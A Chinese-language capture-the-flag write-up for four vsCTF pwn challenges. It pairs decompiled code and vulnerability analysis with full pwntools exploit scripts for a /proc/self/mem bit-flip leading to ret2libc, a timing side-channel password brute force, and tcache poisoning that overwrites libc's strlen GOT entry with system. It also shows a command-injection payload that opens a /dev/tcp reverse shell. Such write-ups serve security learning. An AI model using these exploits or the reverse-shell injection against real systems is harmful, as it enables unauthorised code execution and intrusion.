vsctf_pwn

题目附件https://github.com/nyyyddddn/ctf/tree/main/vsctf_pwn

pwn

cosmic-ray-v3

程序的逻辑

int __cdecl main(int argc, const char **argv, const char **envp)
{
  signed __int64 v3; // rax

  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  cosmic_ray();
  v3 = sys_exit(0);
  return 0;
}

__int64 cosmic_ray()
{
  __off_t offset; // [rsp+8h] [rbp-28h] BYREF
  char v2; // [rsp+12h] [rbp-1Eh] BYREF
  char buf; // [rsp+13h] [rbp-1Dh] BYREF
  unsigned int v4; // [rsp+14h] [rbp-1Ch] BYREF
  __int64 v5; // [rsp+18h] [rbp-18h]
  __int64 v6; // [rsp+20h] [rbp-10h]
  int fd; // [rsp+28h] [rbp-8h]
  int i; // [rsp+2Ch] [rbp-4h]

  puts("Enter an address to send a cosmic ray through:");
  __isoc99_scanf("0x%lx", &offset);
  getchar();
  putchar(10);
  fd = open("/proc/self/mem", 2);
  lseek(fd, offset, 0);
  read(fd, &buf, 1uLL);
  v6 = byte_to_binary((unsigned int)buf);
  puts("|0|1|2|3|4|5|6|7|");
  puts("-----------------");
  putchar(124);
  for ( i = 0; i <= 7; ++i )
    printf("%d|", (unsigned int)*(char *)(i + v6));
  putchar(10);
  putchar(10);
  puts("Enter the bit position to flip:");
  __isoc99_scanf("%d", &v4);
  getchar();
  if ( v4 >= 8 )
    exit(1);
  v5 = flip_bit(v6, v4);
  v2 = binary_to_byte(v5);
  putchar(10);
  printf("Bit succesfully flipped! New value is %d\n\n", (unsigned int)v2);
  lseek(fd, offset, 0);
  write(fd, &v2, 1uLL);
  return 0LL;
}

这里很神奇的地方是cosmic_ray其实能翻转没有写权限段的数据，通过/proc/self/mem linux中的伪文件系统实现的

然后程序中有一个很奇怪的地方，这个exit是通过内联汇编实现的exit，手工fuzz了好久，发现翻转 0xb8可以将 mov eax,0x3c 变成 mov edx,0x3c，也就是syscall read，刚刚好能溢出，覆盖返回地址六个字节，main函数的返回地址是libc_start_main上的地址，刚刚好是六个字节

这时候想到的做法是，先翻转 0xb8回到main后，再将syscall read的rdx改大，这样就可以打rop了，高版本glibc csu函数变成动态链接，所以没有好用的修改寄存器的gadget，但是可以通过cosmic_ray 去写gadget，只需要写一个pop rdi ret的gadget，打ret2libc就好了

.text:00000000004015E0 E8 E9 FD FF FF                call    cosmic_ray
.text:00000000004015E0
.text:00000000004015E5 B8 3C 00 00 00                mov     eax, 3Ch ; '<'
.text:00000000004015EA 48 31 FF                      xor     rdi, rdi                        ; error_code
.text:00000000004015ED 0F 05                         syscall                                 ; LINUX - sys_exit
.text:00000000004015EF B8 00 00 00 00                mov     eax, 0
.text:00000000004015F4 5D                            pop     rbp
.text:00000000004015F5 C3                            retn
.text:00000000004015F5                               ; } // starts at 4015AB

exp

from pwn import *
## from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "vsc.tf"
PORT = 7000

elf = context.binary = ELF('./cosmicrayv3')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

addr = "0x4015E5"
main = 0x4015AF
bss = 0x3fe000

## .text:00000000004015E5 B8 3C 00 00 00                mov     eax, 3Ch ; '<'
## .text:00000000004015EA 48 31 FF                      xor     rdi, rdi                        ; error_code
## .text:00000000004015ED 0F 05                         syscall    


sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","6") # stackover flow

## .text:00000000004015AF 55                            push    rbp
## .text:00000000004015B0 48 89 E5                      mov     rbp, rsp
## .text:00000000004015B3 48 8B 05 66 2A 00 00          mov     rax, cs:stdout@GLIBC_2_2_5
## .text:00000000004015BA BE 00 00 00 00                mov     esi, 0                          ; buf
## .text:00000000004015BF 48 89 C7                      mov     rdi, rax                        ; stream
## .text:00000000004015C2 E8 49 FB FF FF                call    _setbuf

payload = b'a' * (0x3c - 0x6 - 0x8) + p64(bss + 0x100) + p32(0x4015B0) + b'\x00\x00'
s(payload) 


addr = "0x4015E7"
sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","2") # modify size
payload = b'a' * (0x36 - 0x8) + p64(bss + 0x100) + p64(0x4015B0)
s(payload)

## print(disasm(asm("pop rdi; ret")))
##    0:   5f                      pop    rdi 01011111
##    1:   c3                      ret 11000011

## 0x40100c - 0x40100d 0x2f(00101111) 0x00(00000000)
## 1 2 3
## 0 1 6 7


addr = "0x40100c"
sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","1")
payload = b'a' * (0x36 - 0x8) + p64(bss + 0x100) + p64(0x4015B0)
s(payload)


sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","2")
s(payload)

sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","3")
s(payload)

addr = "0x40100d"

sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","0")
s(payload)

sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","1")
s(payload)

sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","6")
s(payload)

sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","7")
s(payload)


pop_rdi_ret = 0x000000000040100c
getchar_got = elf.got['getchar']
puts_plt = elf.plt['puts']


addr = "0x3fe100" # useless
sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","7")
payload = b'a' * (0x36 - 0x8) + p64(bss + 0x100) + p64(pop_rdi_ret) + p64(getchar_got) + p64(puts_plt) + p64(0x00000000004015AF)
s(payload)

rl()
rl()
rl()
r(1)
libc_base = u64(r(6).ljust(8,b'\x00')) - (0x7c5725c87ae0 - 0x7c5725c00000)
success(f"libc_base ->{hex(libc_base)}")

system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
ret = 0x000000000040101a

addr = "0x3fe100" # useless
sla("Enter an address to send a cosmic ray through:",addr)
sla("Enter the bit position to flip:","7")
payload = b'a' * (0x36 - 0x8) + p64(bss + 0x100) + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
## g(p)
s(payload)




p.interactive()

vs-gateway

程序的逻辑

use std::io::{self, Write};
use std::process::{Command, self};
use std::fs;
use md5;
use rand::{self, Rng};

pub static mut ESSID: String = String::new();
static BSSID: &str = "94:4e:6f:d7:bf:05";
static mut BAND: String = String::new();
static mut CHANNEL: i32 = 0;
static mut WIFI_PASSWORD: String = String::new();
static mut ID: u64 = 0;

fn check_password(password: String) -> bool{
    let digest = md5::compute(password.trim());
    if format!("{:x}", digest) == "e10adc3949ba59abbe56e057f20f883e" {
        true
    }
    else{
        false
    }
}

fn auth() -> bool{
    let mut username = String::new();
    let mut password = String::new();

    print!("Username: ");
    io::stdout().flush().unwrap();
    io::stdin().read_line(&mut username).expect("Cannot read username!");

    print!("Password: ");
    io::stdout().flush().unwrap();
    io::stdin().read_line(&mut password).expect("Cannot read username!");

    if username.trim() == "admin" && check_password(password){
        println!("Access granted!");
        true
    }
    else{
        println!("Access forbidden!");
        false
    }
}

fn save_properties_to_file(){
    unsafe{
        let cmd = format!("echo \"{ESSID}\\n{BAND}\\n{CHANNEL}\\n{WIFI_PASSWORD}\" > /tmp/{ID}.conf");
        Command::new("/bin/sh")
                        .arg("-c")
                        .arg(cmd)
                        .output()
                        .expect("Failed to execute command");
    }
}

fn show_properties(){
    unsafe{
        println!("--- PROPERTIES -----------------------------");
        println!("Essid\t\t{ESSID}");
        println!("Bssid\t\t{BSSID}");
        println!("Band\t\t{BAND}GHz");
        println!("Channel\t\t{CHANNEL}");
        println!("Password\t{WIFI_PASSWORD}\n");
    }
}

fn change_essid(){
    let mut input: String = String::new();
    let mut done = false;

    unsafe{
        println!("Current essid: {ESSID}");
        while !done {
            done = true;
            print!("New essid: ");
            io::stdout().flush().unwrap();
            input.clear();
            io::stdin().read_line(&mut input).expect("Failed to readline");
            for c in input.trim().chars(){
                if !"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ".contains(c){
                    done = false;
                    break
                }
            }
        }
        ESSID = input.trim().to_owned();
        println!("Done!");
    }
    save_properties_to_file();
}

fn change_wifi_band(){
    unsafe{
        println!("Current band: {BAND}GHz");
        if BAND=="2.4"{
            BAND = String::from("5");
            CHANNEL = 100;
        }
        else{
            BAND = String::from("2.4");
            CHANNEL = 6;
        }
        println!("New band: {BAND}GHz");
    }
    save_properties_to_file();
}

fn change_channel(){
    let mut input: String = String::new();
    let mut channel_tmp: i32;

    unsafe{
        print!("Current band: {BAND}GHz ");
        if BAND == "2.4"{
            println!("(from 1 to 11)")
        }
        else{
            println!("(from 36 to 165)")
        }
        println!("Current channel: {CHANNEL}");
        loop {
            print!("New channel: ");
            io::stdout().flush().unwrap();
            input.clear();
            io::stdin().read_line(&mut input).expect("Failed to readline");
            channel_tmp = input.trim().parse().expect("Invalid number");
            if BAND == "2.4" && (1..12).contains(&channel_tmp){
                CHANNEL = channel_tmp;
                break;
            }
            else if BAND == "5" && (36..166).contains(&channel_tmp){
                CHANNEL = channel_tmp;
                break;
            }
        }
        println!("Done!\n");
    }
    save_properties_to_file();
}

fn change_wifi_password(){
    let mut input: String = String::new();

    unsafe{
        println!("Current password: {WIFI_PASSWORD}");
        print!("New password: ");
        io::stdout().flush().unwrap();
        input.clear();
        io::stdin().read_line(&mut input).expect("Failed to readline");
        WIFI_PASSWORD = input.trim().to_owned();
        println!("Done!");
    }
    save_properties_to_file();
}

fn menu(){
    println!("--- MENU ---------------------");
    println!("1. Show properties");
    println!("2. Change essid");
    println!("3. Change wifi band");
    println!("4. Change channel");
    println!("5. Change wifi password");
    println!("6. Exit");
    print!("> ");
    io::stdout().flush().unwrap();
}

fn load_data(){
    unsafe{
        ID = rand::thread_rng().gen_range(1..0xffffffffffffffff);

        let cmd = format!("echo \"View Source Guest\\n2.4\\n6\\n123456789\" > /tmp/{ID}.conf");
        Command::new("/bin/sh")
                        .arg("-c")
                        .arg(cmd)
                        .output()
                        .expect("Failed to execute command");

        let datas = fs::read_to_string(format!("/tmp/{ID}.conf")).expect("Cannot load default data");
        let mut parts = datas.split("\n");
        ESSID   = parts.nth(0).expect("Error when parsing essid").to_owned();
        BAND    = parts.nth(0).expect("Error when parsing band").to_owned();
        CHANNEL = parts.nth(0).expect("Error when parsing channel").to_owned().parse().unwrap();
        WIFI_PASSWORD = parts.nth(0).expect("Error when parsing wifi password").to_owned();
    }
}

fn run(){
    let mut choice;
    let mut input = String::new();

    load_data();
    show_properties();
    loop {
        menu();
        input.clear();
        io::stdin().read_line(&mut input).expect("Cannot read input!");
        choice = match input.trim().parse() {
            Ok(num) => num,
            _ => 0
        };
        match choice {
            1 => show_properties(),
            2 => change_essid(),
            3 => change_wifi_band(),
            4 => change_channel(),
            5 => change_wifi_password(),
            6 => {
                unsafe{
                    fs::remove_file(format!("/tmp/{ID}.conf")).unwrap();
                }
                break
            },
            _ => {
                println!("Invalid choice!");
            },
        }
    }
}

fn main() {
    println!("----------------------------");
    println!("|        VS Gateway        |");
    println!("----------------------------");

    if auth(){
        run();
    }
    process::exit(0);
}

程序是rust语言写的不太熟悉rust，不过程序逻辑很简单，很快就找到漏洞了，每次更新Gateway状态的时候都会调用save_properties_to_file() 这个函数，这个函数的功能是使用shell中 echo的方式将Gateway的状态写到配置文件中，存在一个命令注入，其中修改wifi密码选项那，没有做任何检查，只需要截断一下命令就好了 也就是构造 ;command;# 这样的表达式

fn save_properties_to_file(){
    unsafe{
        let cmd = format!("echo \"{ESSID}\\n{BAND}\\n{CHANNEL}\\n{WIFI_PASSWORD}\" > /tmp/{ID}.conf");
        Command::new("/bin/sh")
                        .arg("-c")
                        .arg(cmd)
                        .output()
                        .expect("Failed to execute command");
    }
}

不过很奇怪的地方是，执行命令后没有回显，尝试重定向fd 还有 /dev/stdout这样的伪文件系统去输出结果，都不太行，后面想到可以反弹shell

password123";/bin/bash -c "/bin/bash -i >& /dev/tcp/127.0.0.1/6666 0>&1";#

shs

程序的逻辑

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+4h] [rbp-1Ch]
  char s[11]; // [rsp+Dh] [rbp-13h] BYREF
  unsigned __int64 v7; // [rsp+18h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Enter the password:");
  fgets(s, 11, stdin);
  if ( (unsigned int)strlen(s) != 10 )
  {
    puts("Wrong password!");
    exit(0);
  }
  for ( i = 0; i <= 9; ++i )
  {
    if ( (unsigned __int8)getPassChar((unsigned int)i) != s[i] )
    {
      puts("Wrong password!");
      exit(0);
    }
  }
  puts("Welcome, admin!");
  system("/bin/sh");
  return v7 - __readfsqword(0x28u);
}

__int64 __fastcall getPassChar(unsigned int a1)
{
  const char *v1; // rsi
  const char *v2; // rax
  unsigned __int8 v4; // [rsp+1Ah] [rbp-36h]
  __int64 v5; // [rsp+20h] [rbp-30h] BYREF
  __int64 v6; // [rsp+28h] [rbp-28h]
  char s[10]; // [rsp+33h] [rbp-1Dh] BYREF
  char v8[11]; // [rsp+3Dh] [rbp-13h] BYREF
  unsigned __int64 v9; // [rsp+48h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  v6 = archive_read_new();
  archive_read_support_filter_all(v6);
  archive_read_support_format_all(v6);
  if ( (unsigned int)archive_read_open_filename(v6, "password.txt.tar.gz", 10240LL) )
  {
    puts("Failed to open archive");
    exit(1);
  }
  snprintf(s, 0xAuLL, "%d.txt", a1);
  while ( !(unsigned int)archive_read_next_header(v6, &v5) )
  {
    v1 = (const char *)archive_entry_pathname(v5);
    if ( !strcmp("password.txt", v1) )
    {
      if ( archive_read_data(v6, v8, 10LL) != 10 )
      {
        puts("Failed to read password");
        exit(1);
      }
      v4 = v8[a1];
      break;
    }
    v2 = (const char *)archive_entry_pathname(v5);
    if ( !strcmp(s, v2) )
    {
      if ( archive_read_data(v6, v8, 1LL) != 1 )
      {
        puts("Failed to read password");
        exit(1);
      }
      v4 = v8[0];
      break;
    }
  }
  if ( !v4 )
  {
    puts("Failed to find password");
    exit(1);
  }
  if ( (unsigned int)archive_read_free(v6) )
  {
    puts("Failed to free archive");
    exit(1);
  }
  usleep(0x7A120u);
  return v4;
}

远程环境的password.txt.tar.gz 和附件中的password.txt.tar.gz 不相同，直接爆破password的话是一个指数问题，有一个sleep的逻辑usleep(0x7A120u); 可以通过判断sleep的时间来判断第i位的内容是否是正确的password

exp

from pwn import *
from string import printable
import time


context.log_level='error'

IP = "vsc.tf"
PORT = 7004 

password = list('a' * 10)

idx = 0
wait_time = 0.5
tolerance_time = 0.03

while idx < 10:
    for c in printable:
        try:
            print(f'{"".join(password)[:idx + 1]} |current character ->{c}')

            p = process("./shs")
            # p = remote(IP,PORT)
            p.recvuntil("password:")
            password[idx] = c
            start_time = time.time()
            p.sendline(''.join(password).encode())
            p.recvuntil(b'W') 
            end_time = time.time()

            p.close()
            remaining_time = (end_time - start_time - wait_time)

            if remaining_time > tolerance_time:
                idx += 1
                wait_time = 0.5 * (idx + 1)
                break

        except:
            pass

print("".join(password)[:idx + 1])

Domain Expansion

程序的逻辑

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  while ( 2 )
  {
    while ( 1 )
    {
      menu();
      printf("Enter your choice: ");
      __isoc99_scanf("%d", &v4);
      if ( v4 <= 5 )
        break;
      if ( v4 == 260 )
      {
        if ( domain_expanded )
          puts("You cannot use this ability again!");
        else
          domain_expansion();
      }
      else
      {
LABEL_15:
        puts("Invalid choice");
      }
    }
    if ( v4 <= 0 )
      goto LABEL_15;
    switch ( v4 )
    {
      case 1:
        create();
        continue;
      case 2:
        edit();
        continue;
      case 3:
        print();
        continue;
      case 4:
        delete();
        continue;
      case 5:
        return 0;
      default:
        goto LABEL_15;
    }
  }
}

unsigned __int64 domain_expansion()
{
  unsigned int v1; // [rsp+Ch] [rbp-14h] BYREF
  __int64 v2; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("DOMAIN EXPANSION");
  printf("Enter an index: ");
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( v1 <= 0xF && *((_QWORD *)&chunks + 2 * (int)v1) )
  {
    printf("Expanded size: ");
    __isoc99_scanf("%lu", &v2);
    getchar();
    *(_QWORD *)(*((_QWORD *)&chunks + 2 * (int)v1) - 8LL) = v2;
    qword_4068[2 * (int)v1] = v2;
    domain_expanded = 1;
  }
  else
  {
    puts("Invalid index");
  }
  return v3 - __readfsqword(0x28u);
}

unsigned __int64 create()
{
  unsigned int v0; // ebx
  unsigned int idx; // [rsp+Ch] [rbp-24h] BYREF
  size_t size; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v4; // [rsp+18h] [rbp-18h]

  v4 = __readfsqword(0x28u);
  printf("Enter an index: ");
  __isoc99_scanf("%d", &idx);
  getchar();
  if ( idx > 0xF || *((_QWORD *)&chunks + 2 * (int)idx) )
  {
    puts("Invalid index");
  }
  else
  {
    printf("Enter a size: ");
    __isoc99_scanf("%lu", &size);
    getchar();
    if ( size <= 0x1000 )
    {
      v0 = idx;
      *((_QWORD *)&chunks + 2 * (int)v0) = malloc(size);
      qword_4068[2 * (int)idx] = size;
      printf("Chunk created at index %d\n", idx);
    }
    else
    {
      puts("Too big!");
    }
  }
  return v4 - __readfsqword(0x28u);
}

unsigned __int64 edit()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Enter an index: ");
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( v1 <= 0xF && *((_QWORD *)&chunks + 2 * (int)v1) )
  {
    printf("Enter data: ");
    readline(*((_QWORD *)&chunks + 2 * (int)v1), qword_4068[2 * (int)v1]);
  }
  else
  {
    puts("Invalid index");
  }
  return v2 - __readfsqword(0x28u);
}

unsigned __int64 print()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Enter an index: ");
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( v1 <= 0xF && *((_QWORD *)&chunks + 2 * (int)v1) )
  {
    printf("Data: ");
    puts(*((const char **)&chunks + 2 * (int)v1));
  }
  else
  {
    puts("Invalid index");
  }
  return v2 - __readfsqword(0x28u);
}

unsigned __int64 delete()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Enter an index: ");
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( v1 <= 0xF && *((_QWORD *)&chunks + 2 * (int)v1) )
  {
    free(*((void **)&chunks + 2 * (int)v1));
    *((_QWORD *)&chunks + 2 * (int)v1) = 0LL;
    qword_4068[2 * (int)v1] = 0LL;
    printf("Chunk deleted at index %d\n", v1);
  }
  else
  {
    puts("Invalid index");
  }
  return v2 - __readfsqword(0x28u);
}

glibc 2.35，domain_expanded中可以构造一个堆叠，通过tcache poison，写 libc got中strlen为system 然后去puts一个内容为binsh的堆就可以getshell了，这条利用链第一次见。

puts 一进去后会call strlen，同时call strlen的时候 rdi寄存器没有更新，然后libc.so的RELRO保护是Partial RELRO，got表还是可以写的

.text:0000000000080E50                               ; __int64 __fastcall puts(__int64)
.text:0000000000080E50                               public puts ; weak
.text:0000000000080E50                               puts proc near                          ; DATA XREF: LOAD:000000000000D0C8↑o
.text:0000000000080E50                                                                       ; LOAD:000000000000D1A0↑o
.text:0000000000080E50
.text:0000000000080E50                               var_2C= dword ptr -2Ch
.text:0000000000080E50
.text:0000000000080E50                               ; __unwind { // sub_2A160
.text:0000000000080E50 F3 0F 1E FA                   endbr64                                 ; Alternative name is '_IO_puts'
.text:0000000000080E54 41 56                         push    r14
.text:0000000000080E56 41 55                         push    r13
.text:0000000000080E58 41 54                         push    r12
.text:0000000000080E5A 49 89 FC                      mov     r12, rdi
.text:0000000000080E5D 55                            push    rbp
.text:0000000000080E5E 53                            push    rbx
.text:0000000000080E5F 48 83 EC 10                   sub     rsp, 10h
.text:0000000000080E63 E8 28 76 FA FF                call    j_strlen

exp

from pwn import *
## from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "vsc.tf"
PORT = 7001

elf = context.binary = ELF('./domainexpansion')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()


def create(idx, size):
    sla(b'Enter your choice: ', b'1')
    sla(b'Enter an index: ', str(idx).encode())
    sla(b'Enter a size: ', str(size).encode())

def delete(idx):
    sla(b'Enter your choice: ', b'4')
    sla(b'Enter an index: ', str(idx).encode())

def edit(idx, data):
    sla(b'Enter your choice: ', b'2')
    sla(b'Enter an index: ', str(idx).encode())
    sla(b'Enter data: ', data)

def show(idx):
    sla(b'Enter your choice: ', b'3')
    sla(b'Enter an index: ', str(idx).encode())

def expand(idx, size):
    sla(b'Enter your choice: ', b'260')
    sla(b'Enter an index: ', str(idx).encode())
    sla(b'Expanded size: ', str(size).encode())

def show_chunklist():
    gdb_comm = '''
    x /100gx $rebase(0x4060)
    bins
    '''
    gdb.attach(p,gdb_comm)



create(0,0x40)
create(1,0x80)

for i in range(2, 2 + 7):
    create(i,0x80) 

for i in range(2, 2 + 7):
    delete(i) # refill tcache
delete(1) # unsorted bin 

expand(0,0x40 + 0x8 + 0x80 + 0x8 + 0x1)
edit(0,b'a' * 0x48 + b'a' * 8) 

show(0)
ru(b'a' * 0x48 + b'a' * 8)
leak = u64(r(6).ljust(8,b'\x00')) 
libc_base = leak - (0x731437c1ace0 - 0x731437a00000)
success(f"libc_base ->{hex(libc_base)}")

edit(0,b'\x00' * 0x48 + p64(0x91)) # reset

libc_strlen_got = libc_base + 0x21a098
system = libc_base + libc.sym['system']

for i in range(2, 2 + 7):
    create(i,0x80)
create(1,0x80)

delete(1)
edit(0,b'a' * 0x48 + b'a' * 8)

show(0)
ru(b'a' * 0x48 + b'a' * 8)
heap_addr = u64(r(5).ljust(8,b'\x00'))
heap_base = heap_addr << 12
success(hex(heap_base))

edit(0,b'\x00' * 0x48 + p64(0x91) + p64(0) + p64(0)) # reset
create(1,0x80)

delete(8)
delete(1)

edit(0,b'\x00' * 0x48 + p64(0x91) + p64((libc_strlen_got - 0x18) ^ (heap_base >> 12)))

create(1,0x80)
create(9,0x80)

edit(1,b'/bin/sh\x00')
edit(9,b'\x00' * 0x18 + p64(system))

## gdb_comm = '''
## b puts
## c
## '''

## gdb.attach(p,gdb_comm)
show(1)

p.interactive()